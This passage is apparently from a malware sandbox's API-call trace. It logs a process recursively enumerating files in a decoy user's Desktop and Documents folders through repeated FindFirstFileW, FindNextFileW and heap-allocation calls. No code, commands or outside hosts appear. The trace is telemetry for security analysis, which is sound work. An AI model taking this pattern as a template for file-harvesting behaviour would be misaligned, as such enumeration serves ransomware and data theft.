cAlternateFileName="UNNZ0I~1.AVI")) returned 1 [0071.762] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.762] lstrlenW (lpString="unn z0iEwxlgp5Vg OO.avi") returned 23 [0071.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x7186e0 [0071.763] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad388a30, ftCreationTime.dwHighDateTime=0x1d5dbf2, ftLastAccessTime.dwLowDateTime=0x7492ab60, ftLastAccessTime.dwHighDateTime=0x1d5dda1, ftLastWriteTime.dwLowDateTime=0x7492ab60, ftLastWriteTime.dwHighDateTime=0x1d5dda1, nFileSizeHigh=0x0, nFileSizeLow=0x7b97, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="V mob-KlbBH.avi", cAlternateFileName="VMOB-K~1.AVI")) returned 1 [0071.763] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.763] lstrlenW (lpString="V mob-KlbBH.avi") returned 15 [0071.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x7187c0 [0071.763] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6c03f30, ftCreationTime.dwHighDateTime=0x1d5e04b, ftLastAccessTime.dwLowDateTime=0xd33da780, ftLastAccessTime.dwHighDateTime=0x1d5e7f3, ftLastWriteTime.dwLowDateTime=0xd33da780, ftLastWriteTime.dwHighDateTime=0x1d5e7f3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="VQrFqGOacmP", cAlternateFileName="VQRFQG~1")) returned 1 [0071.763] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.763] lstrlenW (lpString="VQrFqGOacmP") returned 11 [0071.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x718890 [0071.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\*", lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6c03f30, ftCreationTime.dwHighDateTime=0x1d5e04b, ftLastAccessTime.dwLowDateTime=0xd33da780, ftLastAccessTime.dwHighDateTime=0x1d5e7f3, ftLastWriteTime.dwLowDateTime=0xd33da780, ftLastWriteTime.dwHighDateTime=0x1d5e7f3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName=".", cAlternateFileName="")) returned 0x70cf00 [0071.763] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6c03f30, ftCreationTime.dwHighDateTime=0x1d5e04b, ftLastAccessTime.dwLowDateTime=0xd33da780, ftLastAccessTime.dwHighDateTime=0x1d5e7f3, ftLastWriteTime.dwLowDateTime=0xd33da780, ftLastWriteTime.dwHighDateTime=0x1d5e7f3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="..", cAlternateFileName="")) returned 1 [0071.763] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.763] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6720c820, ftCreationTime.dwHighDateTime=0x1d5d8cb, ftLastAccessTime.dwLowDateTime=0xf1df61d0, ftLastAccessTime.dwHighDateTime=0x1d5db21, ftLastWriteTime.dwLowDateTime=0xf1df61d0, ftLastWriteTime.dwHighDateTime=0x1d5db21, nFileSizeHigh=0x0, nFileSizeLow=0x138fa, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="3pQu1NrivN5QHUMA.gif", cAlternateFileName="3PQU1N~1.GIF")) returned 1 [0071.763] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.764] lstrlenW (lpString="3pQu1NrivN5QHUMA.gif") returned 20 [0071.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe6) returned 0x719af0 [0071.764] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b34d8d0, ftCreationTime.dwHighDateTime=0x1d5e08a, ftLastAccessTime.dwLowDateTime=0xe20abb40, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0xe20abb40, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="NIIZswuck", cAlternateFileName="NIIZSW~1")) returned 1 [0071.764] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.764] lstrlenW (lpString="NIIZswuck") returned 9 [0071.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x719be0 [0071.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\*", lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b34d8d0, ftCreationTime.dwHighDateTime=0x1d5e08a, ftLastAccessTime.dwLowDateTime=0xe20abb40, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0xe20abb40, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70bce0 [0071.764] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b34d8d0, ftCreationTime.dwHighDateTime=0x1d5e08a, ftLastAccessTime.dwLowDateTime=0xe20abb40, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0xe20abb40, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.791] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.791] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c9d49a0, ftCreationTime.dwHighDateTime=0x1d5d90f, ftLastAccessTime.dwLowDateTime=0x725ad40, ftLastAccessTime.dwHighDateTime=0x1d5dd8b, ftLastWriteTime.dwLowDateTime=0x725ad40, ftLastWriteTime.dwHighDateTime=0x1d5dd8b, nFileSizeHigh=0x0, nFileSizeLow=0x5999, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZO9np.mkv", cAlternateFileName="")) returned 1 [0071.791] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.791] lstrlenW (lpString="IZO9np.mkv") returned 10 [0071.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe6) returned 0x70bae0 [0071.811] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0fdc690, ftCreationTime.dwHighDateTime=0x1d5e6b5, ftLastAccessTime.dwLowDateTime=0xf5dd09b0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0xf5dd09b0, ftLastWriteTime.dwHighDateTime=0x1d5e600, nFileSizeHigh=0x0, nFileSizeLow=0x2de9, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcoSsouqjkx-.m4a", cAlternateFileName="WCOSSO~1.M4A")) returned 1 [0071.811] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.811] lstrlenW (lpString="wcoSsouqjkx-.m4a") returned 16 [0071.811] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf2) returned 0x71c090 [0071.811] FindNextFileW (in: hFindFile=0x70bce0, lpFindFileData=0x719be0 | out: lpFindFileData=0x719be0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0fdc690, ftCreationTime.dwHighDateTime=0x1d5e6b5, ftLastAccessTime.dwLowDateTime=0xf5dd09b0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0xf5dd09b0, ftLastWriteTime.dwHighDateTime=0x1d5e600, nFileSizeHigh=0x0, nFileSizeLow=0x2de9, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcoSsouqjkx-.m4a", cAlternateFileName="WCOSSO~1.M4A")) returned 0 [0071.811] FindClose (in: hFindFile=0x70bce0 | out: hFindFile=0x70bce0) returned 1 [0071.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719be0 | out: hHeap=0x6d0000) returned 1 [0071.811] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78986230, ftCreationTime.dwHighDateTime=0x1d5e612, ftLastAccessTime.dwLowDateTime=0xe7acb8c0, ftLastAccessTime.dwHighDateTime=0x1d5dd56, ftLastWriteTime.dwLowDateTime=0xe7acb8c0, ftLastWriteTime.dwHighDateTime=0x1d5dd56, nFileSizeHigh=0x0, nFileSizeLow=0x13de8, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="odyCZw4uSwXQ1.avi", cAlternateFileName="ODYCZW~1.AVI")) returned 1 [0071.811] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.811] lstrlenW (lpString="odyCZw4uSwXQ1.avi") returned 17 [0071.811] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x71c190 [0071.811] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe84fd560, ftCreationTime.dwHighDateTime=0x1d5dacb, ftLastAccessTime.dwLowDateTime=0xd9fb7830, ftLastAccessTime.dwHighDateTime=0x1d5db15, ftLastWriteTime.dwLowDateTime=0xd9fb7830, ftLastWriteTime.dwHighDateTime=0x1d5db15, nFileSizeHigh=0x0, nFileSizeLow=0x3b7d, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="pkkgt4GR.wav", cAlternateFileName="")) returned 1 [0071.811] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.811] lstrlenW (lpString="pkkgt4GR.wav") returned 12 [0071.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x71c278 [0071.812] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cd4b4c0, ftCreationTime.dwHighDateTime=0x1d5e58e, ftLastAccessTime.dwLowDateTime=0xb3620d80, ftLastAccessTime.dwHighDateTime=0x1d5db72, ftLastWriteTime.dwLowDateTime=0xb3620d80, ftLastWriteTime.dwHighDateTime=0x1d5db72, nFileSizeHigh=0x0, nFileSizeLow=0xef19, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="QzXsG1Yaen9odjLG.ppt", cAlternateFileName="QZXSG1~1.PPT")) returned 1 [0071.812] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.812] lstrlenW (lpString="QzXsG1Yaen9odjLG.ppt") returned 20 [0071.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe6) returned 0x71c358 [0071.812] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779f6d60, ftCreationTime.dwHighDateTime=0x1d5e09a, ftLastAccessTime.dwLowDateTime=0xecd5fd20, ftLastAccessTime.dwHighDateTime=0x1d5d883, ftLastWriteTime.dwLowDateTime=0xecd5fd20, ftLastWriteTime.dwHighDateTime=0x1d5d883, nFileSizeHigh=0x0, nFileSizeLow=0x15d31, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="Rcd2Qcy.odt", cAlternateFileName="")) returned 1 [0071.812] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.812] lstrlenW (lpString="Rcd2Qcy.odt") returned 11 [0071.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd4) returned 0x71c448 [0071.812] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x191d0770, ftCreationTime.dwHighDateTime=0x1d5dba4, ftLastAccessTime.dwLowDateTime=0x7b693690, ftLastAccessTime.dwHighDateTime=0x1d5d84a, ftLastWriteTime.dwLowDateTime=0x7b693690, ftLastWriteTime.dwHighDateTime=0x1d5d84a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="T4mzOs6jEFTU8dFI_r0", cAlternateFileName="T4MZOS~1")) returned 1 [0071.812] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.812] lstrlenW (lpString="T4mzOs6jEFTU8dFI_r0") returned 19 [0071.812] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x71c528 [0071.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\*", lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x191d0770, ftCreationTime.dwHighDateTime=0x1d5dba4, ftLastAccessTime.dwLowDateTime=0x7b693690, ftLastAccessTime.dwHighDateTime=0x1d5d84a, ftLastWriteTime.dwLowDateTime=0x7b693690, ftLastWriteTime.dwHighDateTime=0x1d5d84a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7091f0 [0071.812] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x191d0770, ftCreationTime.dwHighDateTime=0x1d5dba4, ftLastAccessTime.dwLowDateTime=0x7b693690, ftLastAccessTime.dwHighDateTime=0x1d5d84a, ftLastWriteTime.dwLowDateTime=0x7b693690, ftLastWriteTime.dwHighDateTime=0x1d5d84a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.812] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.813] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6904a100, ftCreationTime.dwHighDateTime=0x1d5e408, ftLastAccessTime.dwLowDateTime=0xa40b6130, ftLastAccessTime.dwHighDateTime=0x1d5e6a1, ftLastWriteTime.dwLowDateTime=0xa40b6130, ftLastWriteTime.dwHighDateTime=0x1d5e6a1, nFileSizeHigh=0x0, nFileSizeLow=0xfe9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="AYAitI6ulwKkNQyfl2It.mp3", cAlternateFileName="AYAITI~1.MP3")) returned 1 [0071.813] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.813] lstrlenW (lpString="AYAitI6ulwKkNQyfl2It.mp3") returned 24 [0071.813] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x116) returned 0x71abe8 [0071.813] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed773fe0, ftCreationTime.dwHighDateTime=0x1d5e65d, ftLastAccessTime.dwLowDateTime=0x48f02a60, ftLastAccessTime.dwHighDateTime=0x1d5e485, ftLastWriteTime.dwLowDateTime=0x48f02a60, ftLastWriteTime.dwHighDateTime=0x1d5e485, nFileSizeHigh=0x0, nFileSizeLow=0xf97b, dwReserved0=0x0, dwReserved1=0x0, cFileName="b8Jc-wtgQfc9eT9v.swf", cAlternateFileName="B8JC-W~1.SWF")) returned 1 [0071.813] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.813] lstrlenW (lpString="b8Jc-wtgQfc9eT9v.swf") returned 20 [0071.813] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10e) returned 0x71ad08 [0071.813] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b44ab40, ftCreationTime.dwHighDateTime=0x1d5e26e, ftLastAccessTime.dwLowDateTime=0x8c476c00, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x8c476c00, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x17934, dwReserved0=0x0, dwReserved1=0x0, cFileName="Og65i8p23Yb_.ots", cAlternateFileName="OG65I8~1.OTS")) returned 1 [0071.813] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.813] lstrlenW (lpString="Og65i8p23Yb_.ots") returned 16 [0071.813] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x71c780 [0071.813] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e72ea0, ftCreationTime.dwHighDateTime=0x1d5e5f2, ftLastAccessTime.dwLowDateTime=0x15455470, ftLastAccessTime.dwHighDateTime=0x1d5dc05, ftLastWriteTime.dwLowDateTime=0x15455470, ftLastWriteTime.dwHighDateTime=0x1d5dc05, nFileSizeHigh=0x0, nFileSizeLow=0x1052d, dwReserved0=0x0, dwReserved1=0x0, cFileName="TyIftuQdeV.gif", cAlternateFileName="TYIFTU~1.GIF")) returned 1 [0071.813] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.813] lstrlenW (lpString="TyIftuQdeV.gif") returned 14 [0071.813] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x102) returned 0x71c890 [0071.813] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x71c528 | out: lpFindFileData=0x71c528*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e72ea0, ftCreationTime.dwHighDateTime=0x1d5e5f2, ftLastAccessTime.dwLowDateTime=0x15455470, ftLastAccessTime.dwHighDateTime=0x1d5dc05, ftLastWriteTime.dwLowDateTime=0x15455470, ftLastWriteTime.dwHighDateTime=0x1d5dc05, nFileSizeHigh=0x0, nFileSizeLow=0x1052d, dwReserved0=0x0, dwReserved1=0x0, cFileName="TyIftuQdeV.gif", cAlternateFileName="TYIFTU~1.GIF")) returned 0 [0071.813] FindClose (in: hFindFile=0x7091f0 | out: hFindFile=0x7091f0) returned 1 [0071.813] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c528 | out: hHeap=0x6d0000) returned 1 [0071.813] FindNextFileW (in: hFindFile=0x70cf00, lpFindFileData=0x718890 | out: lpFindFileData=0x718890*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x191d0770, ftCreationTime.dwHighDateTime=0x1d5dba4, ftLastAccessTime.dwLowDateTime=0x7b693690, ftLastAccessTime.dwHighDateTime=0x1d5d84a, ftLastWriteTime.dwLowDateTime=0x7b693690, ftLastWriteTime.dwHighDateTime=0x1d5d84a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe82f7e2a, dwReserved1=0x21bdf6c7, cFileName="T4mzOs6jEFTU8dFI_r0", cAlternateFileName="T4MZOS~1")) returned 0 [0071.814] FindClose (in: hFindFile=0x70cf00 | out: hFindFile=0x70cf00) returned 1 [0071.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x718890 | out: hHeap=0x6d0000) returned 1 [0071.814] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a0ea00, ftCreationTime.dwHighDateTime=0x1d5e5b7, ftLastAccessTime.dwLowDateTime=0x23e45130, ftLastAccessTime.dwHighDateTime=0x1d5d934, ftLastWriteTime.dwLowDateTime=0x23e45130, ftLastWriteTime.dwHighDateTime=0x1d5d934, nFileSizeHigh=0x0, nFileSizeLow=0x1137e, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="W1U79DXC.mkv", cAlternateFileName="")) returned 1 [0071.814] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.814] lstrlenW (lpString="W1U79DXC.mkv") returned 12 [0071.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x70bc90 [0071.814] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651d4960, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x9b8cc670, ftLastAccessTime.dwHighDateTime=0x1d5de72, ftLastWriteTime.dwLowDateTime=0x9b8cc670, ftLastWriteTime.dwHighDateTime=0x1d5de72, nFileSizeHigh=0x0, nFileSizeLow=0xad02, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Z88VY1b.gif", cAlternateFileName="")) returned 1 [0071.814] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.814] lstrlenW (lpString="Z88VY1b.gif") returned 11 [0071.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbc) returned 0x71c528 [0071.814] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac3fd0, ftCreationTime.dwHighDateTime=0x1d5e6db, ftLastAccessTime.dwLowDateTime=0x76787c0, ftLastAccessTime.dwHighDateTime=0x1d5e1ea, ftLastWriteTime.dwLowDateTime=0x76787c0, ftLastWriteTime.dwHighDateTime=0x1d5e1ea, nFileSizeHigh=0x0, nFileSizeLow=0x6d43, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="zIoWUFykpVWrvA.mp3", cAlternateFileName="ZIOWUF~1.MP3")) returned 1 [0071.814] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.814] lstrlenW (lpString="zIoWUFykpVWrvA.mp3") returned 18 [0071.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xca) returned 0x71c5f0 [0071.814] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2d810, ftCreationTime.dwHighDateTime=0x1d5dabd, ftLastAccessTime.dwLowDateTime=0x93913860, ftLastAccessTime.dwHighDateTime=0x1d5db67, ftLastWriteTime.dwLowDateTime=0x93913860, ftLastWriteTime.dwHighDateTime=0x1d5db67, nFileSizeHigh=0x0, nFileSizeLow=0x9d4b, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Z_XV.rtf", cAlternateFileName="")) returned 1 [0071.814] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.814] lstrlenW (lpString="Z_XV.rtf") returned 8 [0071.814] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb6) returned 0x71c9a0 [0071.814] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a2d810, ftCreationTime.dwHighDateTime=0x1d5dabd, ftLastAccessTime.dwLowDateTime=0x93913860, ftLastAccessTime.dwHighDateTime=0x1d5db67, ftLastWriteTime.dwLowDateTime=0x93913860, ftLastWriteTime.dwHighDateTime=0x1d5db67, nFileSizeHigh=0x0, nFileSizeLow=0x9d4b, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Z_XV.rtf", cAlternateFileName="")) returned 0 [0071.814] FindClose (in: hFindFile=0x70cf40 | out: hFindFile=0x70cf40) returned 1 [0071.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.815] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd900ea60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd900ea60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0071.815] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.815] lstrlenW (lpString="Documents") returned 9 [0071.815] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412050 [0071.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd900ea60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd900ea60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x7091f0 [0071.815] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd900ea60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd900ea60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.815] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.815] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x101c00f0, ftCreationTime.dwHighDateTime=0x1d5e576, ftLastAccessTime.dwLowDateTime=0x3ad302c0, ftLastAccessTime.dwHighDateTime=0x1d5b29b, ftLastWriteTime.dwLowDateTime=0x3ad302c0, ftLastWriteTime.dwHighDateTime=0x1d5b29b, nFileSizeHigh=0x0, nFileSizeLow=0x3786, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="6nm83gQvsAMAgLL.docx", cAlternateFileName="6NM83G~1.DOC")) returned 1 [0071.815] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.815] lstrlenW (lpString="6nm83gQvsAMAgLL.docx") returned 20 [0071.815] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x71ca60 [0071.815] FindNextFileW (in: hFindFile=0x7091f0, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb82808b0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0x839eedf0, ftLastAccessTime.dwHighDateTime=0x1d57a9e, 